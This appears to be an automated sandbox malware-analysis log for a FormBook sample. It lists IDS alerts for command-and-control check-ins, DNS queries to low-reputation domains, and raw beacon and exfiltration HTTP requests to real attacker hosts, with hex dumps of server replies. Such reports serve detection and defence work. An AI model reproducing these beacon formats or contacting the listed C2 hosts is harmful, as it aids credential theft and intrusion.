                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49696 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49697 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49708 -> 109.206.161.15:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49711 -> 109.206.161.15:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 109.206.161.15:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49703 -> 209.74.64.189:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49715 -> 45.119.52.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 162.218.30.235:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49695 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49728 -> 216.10.241.228:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49701 -> 209.74.64.189:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49694 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49730 -> 216.10.241.228:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49716 -> 85.13.129.16:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49700 -> 209.74.64.189:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49693 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49704 -> 104.21.3.103:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 109.206.161.15:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49707 -> 104.21.3.103:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49706 -> 104.21.3.103:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49691 -> 162.218.30.235:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49732 -> 162.218.30.235:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49720 -> 188.114.97.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49689 -> 162.218.30.235:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49724 -> 188.114.96.3:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49699 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 85.13.129.16:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49688 -> 162.218.30.235:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49727 -> 188.114.96.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49698 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49702 -> 209.74.64.189:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49705 -> 104.21.3.103:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 188.114.97.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49712 -> 45.119.52.109:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49719 -> 85.13.129.16:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 45.119.52.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49718 -> 85.13.129.16:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49722 -> 188.114.97.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49726 -> 188.114.96.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49725 -> 188.114.96.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49690 -> 162.218.30.235:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49723 -> 188.114.97.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 45.119.52.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 216.10.241.228:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49731 -> 216.10.241.228:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49692 -> 84.32.84.32:80
                    Performs DNS queries to domains with low reputation
                    Source: DNS query: www.l54354.xyz
                    Source: DNS query: www.autoluxmod.xyz
                    Source: DNS query: www.asianoilporn.xyz
                    Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                    Source: Joe Sandbox ViewIP Address: 85.13.129.16 85.13.129.16
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001A25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_001A25E2
                    Source: global trafficHTTP traffic detected: GET /fu2r/?bnb=EjX2S1Ph5XCWfwV2QvfHosGqsbL/vcgmGyiovwl6Ejn/r4eSq3rluejL03/CrYuM4rTvYIVMAFTPgdzHeiaMFiTDupOQ6GxecuxHMcGZHTFSd/J1kA==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.shantimotors.netConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /11bh/?bnb=HXttCXaU4qlH+oSPqF6DS432m/64levOR0Mn9gF7d3Wytm4usqo4tepg77FGRNiuc42MI/emRTWeTV1v+Q/PNbqFhxZUN+B7TA6pBkE66KpGpBevng==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.l54354.xyzConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /ed4z/?8v4Hv=cpKH3h&bnb=yvQWRGIF7wqskWcEihREgOF3mDQzbLWLgQ6Ho1Uwm5eAhcT9VUrz7M/8x6oZcsrnqTsCKimVQPb/zM1n2v8k200id06KIOLa4AqE9dQmcjV36VMZ2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /ndhc/?bnb=z7C9Wuft+WAwQ/Q7KVMHRwfpklbArcoSj5+jhEoH+eHGUhYSu8Lo4yyAaBbLjnHatwFWAJV7egL96m2ja/KW4e7Ub8R2COsca5fcq6kVEBii5UZE8g==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.neuron.exchangeConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /dakg/?8v4Hv=cpKH3h&bnb=/V0dHUaqCbtJ/Gm+KUq08jBXAOgRwG+l+jwK+hWmVx3jnyrOQx5DaDsVC6kScxnzTQVysLSbfPxiQ/ET8p9UYdoLxvyzZtbS3uGM7/TUPxKJ1hJ+6Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.creatsta.websiteConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /hhhs/?8v4Hv=cpKH3h&bnb=3fONlZ3BHzk8ct3bdJFNrr+FrdLFG8e5ypLTMaVkgKtRvs1lgNjMuc93WJutZW6EUwBAW5rq6CAAOsZOb60Zq/LrjnS3GCxNuC21jEbShcg/Df1jnQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.tpisharagame.techConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /86jt/?bnb=31kc/+Wl6LN/FjYtTPSiktG84roXnqqnz7GUIvaRHGhqqc+FUh3yYBQHAVIb6krW3kfF/1gTEhEQBLRlhb5nKhJJaN8HQSgUBksp+ZppGJbxIuYULA==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.asianoilporn.xyzConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /ndeg/?bnb=uXJLLswkeLFohfURAMPuJRYZJIFZeHKicCSO+16N3FOsIDlKKFannZiNK3YSKlmUOi7C3rOjNqF7Pm+Goz2bTo8s6EsMYkoLyAOluneL74gw2IMsqg==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.811371bb10.buzzConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /p3jb/?bnb=baLta16S044YbOqB+qUGe5DXcukkaTp+U69DwPrNUDxEIM2/qhayPjXen0e2JWkLCKtKv0evvmuDnTCNxBrvo2JisaY8XCm39xskE76cm+9T5BcIiw==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.delikost.infoConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /izqs/?8v4Hv=cpKH3h&bnb=znOuwYiaskOFcyM/GsSqn0JEMJbSyMHsSdveYB/23/UFYHNBzQzlITz69DD5sgGZofP3y1oDPTsA91VvhFndYIKmLNl26ZFfZBVczyXjFCmbdDFThg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.desktitle.homesConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /kexu/?bnb=vB2aylf3Q2XahtdhLosDE8imHxT8gnaOyIU1/x/DWtHmRdE433nBd+fkpXIkCpVdFXbAQIB1mNsJnhcAO1C9KkO96rRwixvsUK4o5J4zTNrClVAPCw==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.marposet.shopConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficHTTP traffic detected: GET /fu2r/?bnb=EjX2S1Ph5XCWfwV2QvfHosGqsbL/vcgmGyiovwl6Ejn/r4eSq3rluejL03/CrYuM4rTvYIVMAFTPgdzHeiaMFiTDupOQ6GxecuxHMcGZHTFSd/J1kA==&8v4Hv=cpKH3h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.shantimotors.netConnection: closeUser-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0
                    Source: global trafficDNS traffic detected: DNS query: www.hokasportshoes.shop
                    Source: global trafficDNS traffic detected: DNS query: www.shantimotors.net
                    Source: global trafficDNS traffic detected: DNS query: www.l54354.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.envisionmedia.shop
                    Source: global trafficDNS traffic detected: DNS query: www.promocao.info
                    Source: global trafficDNS traffic detected: DNS query: www.neuron.exchange
                    Source: global trafficDNS traffic detected: DNS query: www.creatsta.website
                    Source: global trafficDNS traffic detected: DNS query: www.autoluxmod.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.tpisharagame.tech
                    Source: global trafficDNS traffic detected: DNS query: www.asianoilporn.xyz
                    Source: global trafficDNS traffic detected: DNS query: www.elevatetextiles.net
                    Source: global trafficDNS traffic detected: DNS query: www.811371bb10.buzz
                    Source: global trafficDNS traffic detected: DNS query: www.abbrv.dev
                    Source: global trafficDNS traffic detected: DNS query: www.delikost.info
                    Source: global trafficDNS traffic detected: DNS query: www.desktitle.homes
                    Source: global trafficDNS traffic detected: DNS query: www.marposet.shop
                    Source: unknownHTTP traffic detected: POST /11bh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.l54354.xyzContent-Length: 192Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.l54354.xyzReferer: http://www.l54354.xyz/11bh/User-Agent: Mozilla/5.02.0 Gecko/22.0 Firefox/22.0Data Raw: 62 6e 62 3d 4b 56 46 4e 42 68 32 79 6a 4a 39 53 33 4b 37 74 71 46 4f 62 43 4a 71 50 37 64 6d 63 39 2f 32 58 55 30 42 45 2b 42 38 67 47 48 36 78 33 54 55 6a 74 71 6c 4c 71 38 46 2f 33 59 56 6e 5a 4f 58 53 41 5a 50 36 4d 64 53 41 45 46 61 59 48 55 78 31 72 56 4b 5a 41 4a 57 51 72 51 6c 68 56 66 31 42 62 57 54 2f 42 43 59 77 37 50 78 30 32 67 75 4a 30 32 30 36 49 45 50 31 4d 43 41 5a 54 34 6e 32 4c 72 76 4b 41 76 6c 65 39 57 65 58 6d 71 57 35 44 65 37 46 61 39 61 63 51 76 7a 53 42 54 67 6e 6f 6a 4f 6b 54 78 62 71 77 31 72 58 57 75 51 2b 56 35 36 72 31 38 76 71 79 77 57 69 Data Ascii: bnb=KVFNBh2yjJ9S3K7tqFObCJqP7dmc9/2XU0BE+B8gGH6x3TUjtqlLq8F/3YVnZOXSAZP6MdSAEFaYHUx1rVKZAJWQrQlhVf1BbWT/BCYw7Px02guJ0206IEP1MCAZT4n2LrvKAvle9WeXmqW5De7Fa9acQvzSBTgnojOkTxbqw1rXWuQ+V56r18vqywWi
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:35:37 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sat, 28 Aug 2021 19:11:49 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:36:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:36:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:36:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
